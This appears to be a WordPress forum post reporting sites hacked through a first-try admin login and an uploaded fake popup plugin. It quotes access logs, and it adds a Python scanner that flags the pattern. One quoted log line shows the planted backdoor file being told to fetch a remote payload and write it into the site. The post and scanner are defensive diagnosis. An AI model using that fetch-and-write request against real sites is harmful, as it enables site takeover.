Channel: Topic Tag: malware | WordPress.org

Different sites were hacked the same way on different servers

Hello there,

I’m managing some servers and I’ve figured out that some WordPress sites (from different clients and different developers) are hacked a few days after their installation.

But the hacking methods are all very similar to each other. This is what happens:

1. A user logs into WordPress on his first try (it seems there are no brute-force attacks).
2. The logged in user uploads a plugin named itr-popup.

Here are the logs:

202.58.105.15 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
202.58.105.15 - - [23/May/2019:06:41:31 +0430] "HEAD /wp-login.php HTTP/1.0" 200 570 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:47 +0430] "GET /wp-admin/ HTTP/1.0" 200 127945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:56 +0430] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0" 200 81558 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

3. This plugin contains a file named itro-admin-scripts.php. This file accepts two parameters:

– url: the URL of a txt file that contains malicious code.
– dir: where to save this malware on the victim site.

With this method, the hacker uploads any files he/she wants onto the website and uses them to hack other websites as well.

These are the logs of how the hacker uploaded the scripts:

51.15.180.50 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://nataliehaley.kage-tora.com/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Both sites that this happened to were using WordPress 5.2.1, and they made sure that they did not install this itr-popup plugin on their WordPress websites.

Please note that they are different clients and different developers on different servers.

I even downloaded this plugin from the WordPress repository and it was clean, and the itro-admin-scripts.php file, which I said the hacker used to upload malware to the websites, is not included in the original version downloaded from WordPress.org. So, I believe it’s not a problem with this plugin.

I didn’t find any similar attack reports on the internet. Is anyone else having the same issue? I worry that it’s some kind of bug in WordPress 5.2.1 itself.

Thank you for your help.
Iman
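A small access-log scanner, added here as an example and not part of the post or of WordPress, that turns the three things the post points at into checks a server admin can run over the logs of other sites: a POST to wp-login.php that succeeds (302) with no failed attempt before it from the same address, a POST to update.php?action=upload-plugin (a plugin ZIP uploaded through the admin UI), and a GET to a PHP file under wp-content/plugins with both url and dir parameters (the fetch-and-write request shown above). It also notes when one address uses a second User-Agent within the same log, which the excerpt shows. The sample input is the post's own log excerpt; the function names, the finding "kind" labels and the User-Agent check are my assumptions, not anything from the post.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format, which is the shape of the excerpt in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Sample input: the log lines quoted in the post above (taken from the post, not constructed).
SAMPLE_LOG = """\
202.58.105.15 - - [23/May/2019:06:41:41 +0430] "GET /wp-login.php HTTP/1.0" 200 3944 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
202.58.105.15 - - [23/May/2019:06:41:31 +0430] "HEAD /wp-login.php HTTP/1.0" 200 570 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:45 +0430] "POST /wp-login.php HTTP/1.0" 302 1293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:47 +0430] "GET /wp-admin/ HTTP/1.0" 200 127945 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:41:56 +0430] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0" 200 81558 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:09 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php HTTP/1.0" 200 5813 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
202.58.105.15 - - [23/May/2019:06:42:03 +0430] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.0" 200 51039 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
51.15.180.50 - - [23/May/2019:11:08:32 +0430] "GET /wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts.php?url=http://nataliehaley.kage-tora.com/wp.txt&dir=wp-content/plugins/itr-popup/scripts/jscolor HTTP/1.0" 200 1047 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(e["target"])
    e["path"], e["query"] = url.path, parse_qs(url.query)
    return e


def analyze(log_text):
    """Scan access-log text and return the indicators of the pattern described in the post."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    events.sort(key=lambda e: e["time"])  # the excerpt is not in chronological order
    findings = []
    failed_logins = defaultdict(int)  # ip -> failed POST /wp-login.php count so far
    agents = defaultdict(set)         # ip -> distinct User-Agent strings seen

    def flag(kind, e, detail):
        findings.append({"kind": kind, "ip": e["ip"],
                         "time": e["time"].isoformat(), "detail": detail})

    for e in events:
        ip, path, q = e["ip"], e["path"], e["query"]

        # A second User-Agent from the same address inside one short session is worth a look.
        if e["ua"] not in agents[ip]:
            agents[ip].add(e["ua"])
            if len(agents[ip]) == 2:
                flag("ua_switch", e, "second distinct User-Agent from this address")

        if e["method"] == "POST" and path == "/wp-login.php":
            # WordPress answers a good login with a 302 to wp-admin; a failed one re-renders the form (200).
            if e["status"] == "302" and failed_logins[ip] == 0:
                flag("login_first_try", e, "successful login with no preceding failed attempt")
            elif e["status"] == "200":
                failed_logins[ip] += 1

        if (e["method"] == "POST" and path == "/wp-admin/update.php"
                and q.get("action") == ["upload-plugin"]):
            flag("plugin_upload", e, "plugin ZIP uploaded through the admin UI")

        # A plugin PHP file told where to fetch from and where to write to: the request in the post.
        if (path.startswith("/wp-content/plugins/") and path.endswith(".php")
                and "url" in q and "dir" in q):
            flag("remote_fetch", e, f"url={q['url'][0]} dir={q['dir'][0]}")

    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']:<15} {f['kind']:<16} {f['detail']}")
```

Run it against a site's access log (`python scan.py < access.log` after swapping SAMPLE_LOG for stdin) and read the findings together: a first-try login on its own is what every legitimate user produces, but a first-try login followed minutes later by a plugin upload from the same address, and then a url/dir request to a file inside that plugin, is the sequence the post describes. The remote_fetch check is the one worth alerting on by itself, since no stock plugin file should take a URL to fetch and a directory to write into.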
